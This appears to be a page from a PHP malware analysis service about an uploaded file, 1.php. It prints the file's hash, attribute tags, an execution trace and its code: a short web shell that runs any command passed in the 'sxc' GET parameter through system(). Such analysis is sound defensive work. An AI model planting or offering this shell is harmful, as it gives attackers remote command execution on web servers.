1.php

md5: 25d5ec11b24d34b0b6d098fbd2ae36d3

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original, Traces)

Execution
system (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)

Deobfuscated PHP code
<?php

echo php_uname();
if (isset($_GET['sxc'])) {
    system($_GET['sxc']);
}
Execution traces
data/traces/25d5ec11b24d34b0b6d098fbd2ae36d3_trace-1676247630.5668.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:20:56.464579]
1	0	1	0.000232	393464
1	3	0	0.000285	394328	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000301	394328	php_uname	0		/var/www/html/uploads/1.php	2	0
2	4	1	0.000316	394440
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000338	394328
			0.000363	314200
TRACE END   [2023-02-12 22:20:56.464762]

Generated HTML code
<html><head></head><body>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</body></html>
Original PHP code
<?php
echo php_uname();
if(isset($_GET['sxc'])){
    system($_GET['sxc']);
}

PHP Malware Analysis

1.php

md5: 25d5ec11b24d34b0b6d098fbd2ae36d3

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code